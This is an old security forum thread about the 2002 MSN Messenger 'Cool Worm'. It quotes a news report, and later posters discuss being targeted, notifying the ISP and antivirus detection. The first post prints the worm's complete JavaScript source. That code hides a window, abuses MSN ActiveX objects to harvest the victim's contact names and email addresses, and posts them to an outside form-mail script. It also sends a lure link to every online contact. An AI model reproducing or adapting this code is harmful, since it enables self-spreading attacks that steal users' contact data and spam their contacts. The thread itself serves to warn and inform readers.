-
February 15th, 2002, 06:18 PM
#1
Msn Worm
Hey all,
MSN messenger, the wellknown im software from our friend Bill G. has another vulnerability...
http://www.theregister.co.uk/content/4/24059.html
A relatively benign but effective Internet worm attacked users of Microsoft's MSN Messenger service Wednesday by exploiting a bug in Internet Explorer that was reported last year, but was only recently patched by Microsoft.
The Cool Worm spreads through the Microsoft Internet Explorer Same Origin Policy Violation vulnerability, reported by a security researcher called "ThePull" on December 19th, which went unacknowledged and unrepaired by Microsoft for months.
The worm code look like this:
<Script>
var msnWin;
var msnList;
var msgStr = "URGENT - Ga hier 'ns heen http://denniz.com/valentijn.html";
//var msgStr = "URGENT - Ga hier 'ns heen http://denniz.com/valentijn";
function Go(){
msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
focus();
if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}
function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "
";
for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "
";
}
else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "
";
}
}
document.contents.contentBox.value = msnStr;
}
function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}
</Script>
<body onload="Go()">
<form METHOD="POST" ACTION="http://www.rjdesigns.co.uk/cgi-bin/FormMail.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.xxxxxxxxx.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="xxxxxxxxxxxxxxxxx@hotmail.com" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
ASCII stupid question, get a stupid ANSI.
When in Russia, pet a PETSCII.
Get your ass over to SLAYRadio the best station for C64 Remixes !
-
February 15th, 2002, 06:19 PM
#2
ASCII stupid question, get a stupid ANSI.
When in Russia, pet a PETSCII.
Get your ass over to SLAYRadio the best station for C64 Remixes !
-
February 15th, 2002, 06:20 PM
#3
Yup. Someone tried to hit me with a variant of this....I've got the code on disk and sent a nice message to Microsoft and the guys isp. :P
"When I get a little money I buy books; and if any is left I buy food and clothes." - Erasmus
"There is no programming language, no matter how structured, that will prevent programmers from writing bad programs." - L. Flon
"Mischief my ass, you are an unethical moron." - chsh
Blog of X
-
February 15th, 2002, 06:42 PM
#4
Someone tried to hit me too..
luckily I was msn-ing under linux, so no harm done...
www.linux-messenger.tk (the JinXed edition ; )
ASCII stupid question, get a stupid ANSI.
When in Russia, pet a PETSCII.
Get your ass over to SLAYRadio the best station for C64 Remixes !
-
February 15th, 2002, 11:19 PM
#5
Junior Member
Good thread jinx...
Some ***** sent me the virus too...
thanks for the patch...
hmmmmmmm forbidden donut!!
-
February 16th, 2002, 12:04 AM
#6
I'm realy sorry for you homer.
I hope there was no real damage done..
but in the future be carefull with url's ppl send u.
ASCII stupid question, get a stupid ANSI.
When in Russia, pet a PETSCII.
Get your ass over to SLAYRadio the best station for C64 Remixes !
-
February 16th, 2002, 02:04 AM
#7
Agreed - good post. Just for the hell of it I cut and pasted this baby and threw it at my av pkgs - they got it right away. Just testing heheh
Trappedagainbyperfectlogic.
-
February 16th, 2002, 08:38 PM
#8
That worm was probably writen by DHF (Dutch HAck force) (A bunch of Ass-0, They took down my ISP for 2weeks once..... )
The worm Deffinatly originated in Holland...... (It contains a Message In Dutch)
Ne way's.... I hope some one will do something about the DHF, coz they ain't exactly White-Hatters.
Nice Post though......I don't use MSN, but my friends (and enemies - HAHAHA) do...
Tanx
With all the subtlety of an artillery barrage / Follow blindly, for the true path is sketchy at best. .: Bring OS X to x86!:.
Og ingen kan minnast dei linne drag i dronningas andlet den fagre dag Då landet her kvilte i heilag fred og alle hadde kjærleik å elske med.
-
February 16th, 2002, 08:55 PM
#9
My version (the one I posted) orriginates by an casema (cable internet) luser..
I gave all the info in a nice mail to the ISP (casema.nl)
There are allso english versions around.
ASCII stupid question, get a stupid ANSI.
When in Russia, pet a PETSCII.
Get your ass over to SLAYRadio the best station for C64 Remixes !
-
February 16th, 2002, 09:06 PM
#10
I use casema, It an absoluta Pile of ----
Probably DHF then, They use them for security since Casema can't tell it's Elbow from it's
Arse-0.....
bwt: Jinx..... U in holland??
With all the subtlety of an artillery barrage / Follow blindly, for the true path is sketchy at best. .: Bring OS X to x86!:.
Og ingen kan minnast dei linne drag i dronningas andlet den fagre dag Då landet her kvilte i heilag fred og alle hadde kjærleik å elske med.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|